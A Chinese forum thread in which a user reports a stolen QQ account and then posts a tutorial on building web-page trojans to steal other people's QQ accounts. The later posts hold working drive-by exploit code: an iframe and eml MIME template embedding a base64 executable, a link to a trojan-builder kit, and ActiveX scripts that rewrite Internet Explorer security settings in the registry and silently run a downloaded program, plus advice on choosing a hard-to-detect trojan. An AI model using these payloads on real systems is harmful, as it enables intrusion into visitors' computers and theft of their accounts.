注册 找回密码

〓盘丝洞论坛〓

搜索
热搜: 活动 交友 discuz
查看: 1723|回复: 10

QQ号已经被盗

[复制链接]
试着删除 发表于 2003-9-23 02:32:32 | 显示全部楼层 |阅读模式
QQ号码:17326074不幸被盗,被盗日期大约与2003年9月20号凌晨左右。现在本人已经弄不回来,望各位高手鼎立相助,不胜感激。
恢复后另行通知
Adela 发表于 2003-9-23 06:55:30 | 显示全部楼层
申请密码保护没?
散烟子 发表于 2003-9-23 07:43:05 | 显示全部楼层
在被盗之后说点后话:
1, 应该使用收费服务,比如和收机绑定,使用移动QQ等收费服务;
2, 尽量不要在网吧使用QQ;
3, 申请密码保护。
商人 发表于 2003-9-23 17:56:04 | 显示全部楼层
可到QQ主页提交申请要回,不过时间一定抓紧!
夜未央 发表于 2003-9-24 00:11:54 | 显示全部楼层
@@
[此贴子已经被作者于2003-9-23 16:12:38编辑过]
绿色萤火虫 发表于 2003-9-25 00:00:21 | 显示全部楼层
在网吧上网,使用密码时千万要小心,建议大家在输入密码时可以颠倒秩序。EG:你的密码为123ASD,你可以先输ASD然后用光标键移动到最前一个位置再输入123,如此一来发到盗密者信箱的是ASD123,而不是123ASD了,不过为了保险起见使用一个比较复杂的密码会比较好一点,也可以重复地多使用几次光标键,这样你的号码就不会太容易被盗!
现在的黑客实在太厉害了,各位GG或JJ们有什么好的对付的办法,别忘了教小的们哦~~






[此贴子已经被作者于2003-9-24 16:06:43编辑过]
咖啡 发表于 2003-9-25 22:40:06 | 显示全部楼层
呵呵,有没搞错啊?
 楼主| 试着删除 发表于 2003-9-27 04:18:39 | 显示全部楼层

制做网页木马远程盗QQ

4000是什么端口?这个大家恐怕最熟了,就是QQ的默认使用端口.但如果你本机4000端口被占用了的话,QQ也会在4000以后挨次开一个端口使用.我以前有网站做论坛时,为吸引人气,送过500多个QQ.其中有我申请的,也有我盗的,这一节我就来说一些怎样盗QQ.去网吧下木马?不是一个好方法,只能盗当地人的QQ,还要小心被人揍呀.哈哈.我要说的是制做网页木马远程盗QQ.
第一种方法,用工具.制做网页木马,都是利用的ie5的漏洞,从而在客户机的电脑中生成exe程序.这里我推荐你用一个傻瓜做网页木马的工具,下载地址:delphi2000.3322.net/source/hack3.zip.我们来看看说明,就知这个工具有多好了.使用说明:
本系统工具包含下列三个工具,和源程序
1.eml文件生成器和c源码
eml.exe是一个将exe文件转换成eml文件的程序,使用时,将要转换的exe文件放在当前目录下,取名为s.exe然运行eml.exe,就会在当前目录下生成s.eml文件,其中eml.c是源程序

2.exe文件转化成htm文件的程序和c源码
e2h4.exe是一个将exe文件转换成html文件的程序,使用时,将要转换的exe文件放在当前目录下,取名为s.exe然后运行e2h4.exe,就会在当前目录下生成1.htm和1.js文件,然后将这两个文件放在你的主页空间中,当有人看你的1.htm网页是,会在他的电脑中自动解码出tmp.exe文件,并将该文件放入对方电脑的启动组中,其中e2h4.c是源程序

3.exe文件转化成bmp文件的程序和c源码
e2b.exe是一个将exe文件转换成bmp文件的程序,使用时,将要转换的exe文件放在当前目录下,取名为s.exe然后运行e2b.exe,就会在当前目录下生成1.htm和1.js以及s.bmp文件,然后将这三个文件放在你的主页空间中,当有人看你的1.htm网页是,会在他的电脑中自动解码出tmp.exe文件,并将该文件放入对方电脑的系统目录中,并在对方电脑中注册表中增加自启动项,其中e2b.c是源程序

第二种方法,手工
如果我们手工制做网页木马呢?这里我就要说到以前我写的一篇文章,frame漏洞的应用,发在黑白,很多人看到了.我现在给重新重理了一下.
iframe是<html>语句里的一个元素,Iframe标记的使用格式是:   <Iframe src="URL" width="x" height="x" scrolling="[OPTION]" frameborder="x"></iframe>   src:文件的路径,既可是HTML文件,也可以是文本、ASP等;   width、height:"画中画"区域的宽与高;   scrolling:当SRC的指定的HTML文件在指定的区域不显不完时,滚动选项,如果设置为NO,则不出现滚动条;如为Auto:则自动出现滚动条;如为Yes,则显示滚动条;   FrameBorder:区域边框的宽度,为了让“画中画“与邻近的内容相融合,常设置为0。 这样在网页里会显示一个框架,框架的内容就是这个src。问题是我们如果在src=""将引号的内容换成别的文件,那么我们能利用它具体能做什么?

1、做网页用呀。干什么?谁扔砖头。将URL换成www.163.com不就是将网易网站变成你网...谢?谢?Ч?亍?/a>]

2、说到重点了,可以读本地文件。假如你女朋友有封情书放成这样c:\\情书.txt。电脑又封锁c:,看不到着急呀。写这样一个脚本<IFRAME SRC="file://c:/情书.txt"></IFRAME>然后保存成htm文件运行后不就看到情书了,呀气死了,是写给lcx的。再想一下如果要运行c:/autoexec.bat应当怎样写?

3、如果要让这个html文件运行exe文件呢?重点中的重点呀。直接运行src=*.exe是下载呀,不是运行。我弄一个木马,别人不买帐,先要下载才执行,能不能让它直接执行呢?聪明人就想出办法了。将src=*.exe换成src=*.eml就可以了。*.eml是什么东西?是outlook邮件格式的附件呀。微软又有漏洞了。如果eml附件是音乐格式的话就可以直接播放了。换句话说,我们用outlook写一封信,附件里带上那个木马.exe文件,然后另存为*.eml文件,将这个附件的格式换成音乐格式....那不就可以了?
好,我在这儿写一个网页木马模板,你照着修改就可以了.先做一个网页,名为1.htm,源码:
<head>
<title>这是一个演示,请不要害怕!!!</title>
</head>
<frameset>
<frame SRC=s.eml>
</frame>
</frameset>
8:20 2002-11-3</p>
</body>
</html>
网页中的有行代码是src=s.eml,这个eml文件的模板如下:
Content-Type: multipart/related;boundary="1" --1
Content-Type: multipart/alternative;boundary="2" --2
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

--1
Content-Type: audio/x-wav;name="hack.exe"
Content-Transfer-Encoding: base64
Content-ID:
TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu MzINCiQ3AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAVCsljwAAAAAAAAAA4ACOgQsBAhkA AgAAAAgAAAAAAAAAEAAAABAAAAAgAAAAAEAAABAAAAACAAABAAAAAAAAAAMACgAAAAAAAFAAAAAE AAAAAAAAAgAAAAAAEAAAIAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAADAAAJAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAQAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ09ERQAAAAAA EAAAABAAAAACAAAABgAAAAAAAAAAAAAAAAAAIAAAYERBVEEAAAAAABAAAAAgAAAABAAAAAgAAAAA AAAAAAAAAAAAAEAAAMAuaWRhdGEAAAAQAAAAMAAAAAIAAAAMAAAAAAAAAAAAAAAAAABAAADALnJl bG9jAAAAEAAAAEAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAagBo ACBAAGgbIEAAagDoBwAAAGoA6AYAAAD/JUwwQAD/JVQwQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABXaW5k b3dzIDl4L05UILvjseDKvre2s8zQ8gDV4srH0ru49tfuvPK1pbXEV2luZG93cyA5eC9OVCAzMs67 u+Ox4NPv0dSzzNDytcTUy9DQveG5+w0KseCzzKO6xN+9qLuqICC+tMfrueLB2aO6aHR0cDovL2hv dHNreS4zNjMubmV0DQogICAgICAgICAgICAgICAgICCh76Hvoe+h76HvDQotLS0tLS0tLS0tLS2x 4NLrwbS907e9yr2julRBU00gNS4wLS0tLS0tLS0tLS0tLS0tDQp0YXNtMzIgIC9tbCAgL20yIHRp bnkNCnRsaW5rMzIgL1RwZSAvYWEgdGlueSAsICwgLCAuLlxsaWJcaW1wb3J0MzIubGliDQotLS0t LS0tLS0tLS0tLS0tLdLUz8LKx7PM0PLV/c7ELS0tLS0tLS0tLS0tLS0tLS0tDQogICAgICAgIC41 ODZwDQogICAgICAgIC5tb2RlbCBmbGF0LFNURENBTEwNCmV4dHJuICAgIE1lc3NhZ2VCb3hBOlBS T0MNCmV4dHJuICAgIEV4aXRQcm9jZXNzOlBST0MNCiAgICAgICAgLmRhdGENCnRpdGxlICAgIGRi ICK0sL/aserM4iIsMA0KbWVzc2FnZSAgZGIgIrSwv9rQxc+iIiwwDQogICAgICAgIC5jb2RlDQpi ZWdpbjoNCiAgICAgICAgY2FsbCBNZXNzYWdlQm94QSwwLE9GRlNFVCBtZXNzYWdlLE9GRlNFVCB0 aXRsZSwwDQogICAgICAgIGNhbGwgRXhpdFByb2Nlc3MsMA0KICAgICAgICBlbmRzDQogICAgICAg IGVuZCBiZWdpbgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPDAAAAAA AAAAAAAAXDAAAEwwAABEMAAAAAAAAAAAAABnMAAAVDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdDAA AAAAAACCMAAAAAAAAHQwAAAAAAAAgjAAAAAAAABVU0VSMzIuZGxsAEtFUk5FTDMyLmRsbAAAAE1l c3NhZ2VCb3hBAAAARXhpdFByb2Nlc3MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAFAAA AAMwCDAcMCIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


你要做的就是修改s.eml模板中的绿色代码.把hack.exe修改为你要盗qq的木马的名字,把下面的编码换成你要盗qq木马的base64编码.如何得到exe文件的base64编码?用outlookexpress就可以.方法这样utlokkpress-邮件-新邮件-插入-文件附件-找到你的木马文件--文件--另存为--s.eml,然后用记事本打开这个s.eml,找到那些整齐的乱码就可以了,用它来替换我这个eml文件里的乱码就可以了.
 楼主| 试着删除 发表于 2003-9-27 04:19:28 | 显示全部楼层
有一个网页木马,不是利用MIME漏洞的,利用一种新思路.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<CNTER><HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<SCRIPT>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (documents.cookie.indexOf("Chg") == -1)
{
Shl.RegWrite ("HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\1004",0,"REG_DWORD");
var expdate = new Date((new Date()).getTime() + (1));
documents.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);
}
init();
</SCRIPT>
<script language="javascript">
<!-- Begin
function opencolortext(){
window.open(\'http://xxx.abc.com/2.htm\',\'colortext\')
}
setTimeout("opencolortext()",1500)
// End -->
</script>
</BODY></HTML>

这个页面是用来修改注册表,将修改IE,运行下栽未授签名的控键
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<SCRIPT language=javascript>
run_exe="<OBJECT ID=\\"RUNIT\\" WIDTH=0 HEIGHT=0 TYPE=\\"application/x-oleobject\\""
run_exe+="CODEBASE=\\"hacker.exe#version=1,1,1,1\\">"
run_exe+="<ARAM NAME=\\"_Version\\" value=\\"65536\\">"
run_exe+="</OBJECT>"
run_exe+="<HTML><H1> </H1></HTML>";
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</SCRIPT>

<META content="Microsoft FrontPage 4.0" name=GENERATOR></HEAD>
<BODY>
<p align="center">论坛连接中请勿终断....
<BR>
<CENTER></CENTER><BR>
<BR></BODY></HTML>

这一段就是用来执行木马程序的,分别做两个网页,可以达到效果
此外,木马最好选择一些体积较小的,我选择的是网络神偷,原因有三点:
1,体积小,最新版教难查杀
2,可以控制局域网内部的机器
3,同时还可以捆绑下载另一个木马,而那个木马就只你真正需要派大用场的.
采薇 发表于 2003-9-27 14:01:51 | 显示全部楼层
研究这个干嘛?打算黑吃黑?[em03]
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|〓盘丝洞〓

GMT+8, 2025-7-5 16:34 , Processed in 0.124800 second(s), 15 queries .

Powered by Discuz! X3.4 © 2001-2013 Comsenz Inc & Style Design

快速回复 返回顶部 返回列表